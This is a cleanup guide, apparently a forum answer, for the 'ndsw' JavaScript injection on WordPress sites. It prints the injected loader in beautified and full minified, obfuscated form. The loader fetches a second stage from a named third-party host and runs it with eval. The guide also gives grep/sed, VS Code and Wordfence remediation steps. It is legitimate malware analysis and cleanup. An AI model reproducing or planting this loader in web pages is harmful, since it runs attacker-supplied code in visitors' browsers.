// Injected loader stage (beautified for analysis). HttpClient and token are not defined inside
// this function; it relies on them existing in an enclosing scope.
(function() {
var a = navigator,
b = document,
e = screen,
f = window,
// g (userAgent), h (platform) and e (screen) are read but not used anywhere in this function.
g = a['userAgent'],
h = a['platform'],
i = b['cookie'],
j = f['location']['hostname'],
k = f['location']['protocol'],
l = b['referrer'];
// Trigger condition: the page has a referrer, the referrer does not contain this site's hostname,
// and document.cookie is empty. Direct visits and visitors holding any script-readable cookie
// never reach the request below.
if (l && !p(l, j) && !i) {
var m = new HttpClient(),
// Second stage is requested from a fixed third-party URL, using the page's own protocol.
o = k + '//layirdmusic.com/Mockup/wp-admin/css/colors/blue/blue.php?id=' + token();
m['get'](o, function(r) {
// The response body is run through window.eval, but only when it contains the marker 'ndsx'.
// Whatever the remote server returns therefore executes with the privileges of the page.
p(r, 'ndsx') && f['eval'](r);
});
}
// Substring test: true when string r contains v (-0x1 is -1).
function p(r, v) {
return r['indexOf'](v) !== -0x1;
}
}());
};;
// Injected malicious loader, shown beautified for analysis; it is not part of the legitimate script.
// One-shot guard: the body runs only while `ndsw` is still undefined and then sets it to true,
// so further copies of this snippet evaluated on the same page do nothing.
if (ndsw === undefined) {
var ndsw = true,
// Minimal XMLHttpRequest wrapper: get(url, callback) issues an asynchronous GET (`!![]` is true)
// and passes responseText to the callback once readyState is 4 and the HTTP status is 200 (0xc8).
HttpClient = function() {
this['get'] = function(a, b) {
var c = new XMLHttpRequest();
c['onreadystatechange'] = function() {
if (c['readyState'] == 0x4 && c['status'] == 0xc8) b(c['responseText']);
}, c['open']('GET', a, !![]), c['send'](null);
};
},
// Base-36 (0x24) rendering of Math.random() with the leading "0." removed by substr(2).
rand = function() {
return Math['random']()['toString'](0x24)['substr'](0x2);
},
// Two rand() strings concatenated; used below as the `id` query value.
// NOTE(review): presumably a cache-buster or per-request id; the purpose is not visible here.
token = function() {
return rand() + rand();
};
(function() {
var a = navigator,
b = document,
e = screen,
f = window,
// g (userAgent), h (platform) and e (screen) are read but not used anywhere in the code shown.
g = a['userAgent'],
h = a['platform'],
i = b['cookie'],
j = f['location']['hostname'],
k = f['location']['protocol'],
l = b['referrer'];
// Trigger condition: the page has a referrer, the referrer does not contain this site's hostname
// (the visitor arrived from another site), and document.cookie is empty. Direct visits and
// visitors holding any script-readable cookie never reach the request below.
// NOTE(review): this gating likely makes the behaviour hard to observe when browsing the site
// directly; verify a cleanup with an external referrer and an empty cookie jar.
if (l && !p(l, j) && !i) {
var m = new HttpClient(),
// Second stage is requested from a fixed third-party URL, using the page's own protocol.
o = k + '//layirdmusic.com/Mockup/wp-admin/css/colors/blue/blue.php?id=' + token();
m['get'](o, function(r) {
// The response body is run through window.eval, but only when it contains the marker 'ndsx'.
// Whatever the remote server returns therefore executes with the privileges of the page.
// A Content-Security-Policy whose script-src omits 'unsafe-eval' blocks this eval, and a
// connect-src allow-list blocks the XMLHttpRequest itself.
p(r, 'ndsx') && f['eval'](r);
});
}
// Substring test: true when string r contains v (-0x1 is -1).
function p(r, v) {
return r['indexOf'](v) !== -0x1;
}
}());
};
这段代码只在浏览器里查看时才会出现;当我检查原始文件时,文件是完好的。
根据 www.virustotal.com 的检测结果,这是一个恶意脚本(JS:Trojan.JS.Agent.UJY),我已经使用 Visual Studio Code 将它删除。
你分享的代码实际上是经过美化(格式化)的;在被感染的文件中,它是压缩(minified)过的,像这样:
// Minified, obfuscated form of the same injected loader, as it appears in an infected file.
// V() holds a table of string fragments, g() returns an entry by index (after subtracting 0x6b),
// and the first IIFE rotates the table until a parseInt-based sum equals 0x301f5. Fragments such as
// 'cooki', 'refer', 'rer', 'respo' and 'nseTe' are concatenated at run time, so those property names
// do not appear whole in the file.
// Visible in clear text in this line: the leading ";if(ndsw===undefined){", the 'ndsx' response marker,
// 'eval', and the '/wp-admin/css/colors/blue/blue.php' request path followed by '?id='.
// NOTE(review): the host is shown as website.domain here, apparently redacted by the poster.
;if(ndsw===undefined){function g(R,G){var y=V();return g=function(O,n){O=O-0x6b;var P=y[O];return P;},g(R,G);}function V(){var v=['ion','index','154602bdaGrG','refer','ready','rando','279520YbREdF','toStr','send','techa','8BCsQrJ','GET','proto','dysta','eval','col','hostn','13190BMfKjR','//website.domain/wp-admin/css/colors/blue/blue.php','locat','909073jmbtRO','get','72XBooPH','onrea','open','255350fMqarv','subst','8214VZcSuI','30KBfcnu','ing','respo','nseTe','?id=','ame','ndsx','cooki','State','811047xtfZPb','statu','1295TYmtri','rer','nge'];V=function(){return v;};return V();}(function(R,G){var l=g,y=R();while(!![]){try{var O=parseInt(l(0x80))/0x1+-parseInt(l(0x6d))/0x2+-parseInt(l(0x8c))/0x3+-parseInt(l(0x71))/0x4*(-parseInt(l(0x78))/0x5)+-parseInt(l(0x82))/0x6*(-parseInt(l(0x8e))/0x7)+parseInt(l(0x7d))/0x8*(-parseInt(l(0x93))/0x9)+-parseInt(l(0x83))/0xa*(-parseInt(l(0x7b))/0xb);if(O===G)break;else y['push'](y['shift']());}catch(n){y['push'](y['shift']());}}}(V,0x301f5));var ndsw=true,HttpClient=function(){var S=g;this[S(0x7c)]=function(R,G){var J=S,y=new XMLHttpRequest();y[J(0x7e)+J(0x74)+J(0x70)+J(0x90)]=function(){var x=J;if(y[x(0x6b)+x(0x8b)]==0x4&&y[x(0x8d)+'s']==0xc8)G(y[x(0x85)+x(0x86)+'xt']);},y[J(0x7f)](J(0x72),R,!![]),y[J(0x6f)](null);};},rand=function(){var C=g;return Math[C(0x6c)+'m']()[C(0x6e)+C(0x84)](0x24)[C(0x81)+'r'](0x2);},token=function(){return rand()+rand();};(function(){var Y=g,R=navigator,G=document,y=screen,O=window,P=G[Y(0x8a)+'e'],r=O[Y(0x7a)+Y(0x91)][Y(0x77)+Y(0x88)],I=O[Y(0x7a)+Y(0x91)][Y(0x73)+Y(0x76)],f=G[Y(0x94)+Y(0x8f)];if(f&&!i(f,r)&&!P){var D=new HttpClient(),U=I+(Y(0x79)+Y(0x87))+token();D[Y(0x7c)](U,function(E){var k=Y;i(E,k(0x89))&&O[k(0x75)](E);});}function i(E,L){var Q=Y;return E[Q(0x92)+'Of'](L)!==-0x1;}}());};
- 安装 Visual Studio Code
- 在VSCode上安装远程SSH扩展
- 连接到您的服务器
- 转到设置(JSON),并添加这一行
"search.maxResults": 500,
(如果你的服务器规格较低或网速较慢,请添加上面这一行。)
然后搜索该脚本的压缩(minified)形式,并全部替换。
最后,删除这个文件:wp-admin/css/colors/blue/blue.php(即上面脚本所请求的那个 PHP 文件)。
通过 SSH 使用 grep 和 sed 命令:按模式搜索,并将受感染的代码替换为空。
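# List every file under the current directory that contains the injected marker ";if(ndsw",
# then delete everything from that marker to the end of the line in each of those files.
# NOTE(review): the grep pattern was garbled on the page and is reconstructed here from the
# sed expression on the same line; confirm it against an infected file before use.
# sed -i edits files in place and removes the rest of the matching line, so take a backup and
# run the grep part on its own first to review the file list.
# -Z / -0 pass NUL-delimited names so paths containing spaces survive; -r skips sed when nothing matches.
grep -rlZ ";if(ndsw" . | xargs -0 -r sed -i "s/;if(ndsw.*//g"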
通过 SSH 连接到服务器,进入您的网站文件夹,然后运行这条命令。所有以 ndsw 开头的恶意脚本都会被删除。注意:sed 表达式会删除从 ;if(ndsw 到该行行尾的全部内容,运行前请先备份,并先单独运行 grep 部分核对文件列表。
我建议你先备份文件和数据库,然后安装一个安全插件,比如 Wordfence。安全插件会把当前文件与官方来源中的原始文件进行比较;如果有任何改动,Wordfence 会为您标出这些改动,并让您把被修改的文件恢复到原始状态,从而完成修复。另外,清除注入的代码并不能消除攻击者最初写入这些文件的途径,因此还应更新 WordPress 核心、插件和主题,并更换相关账户的密码。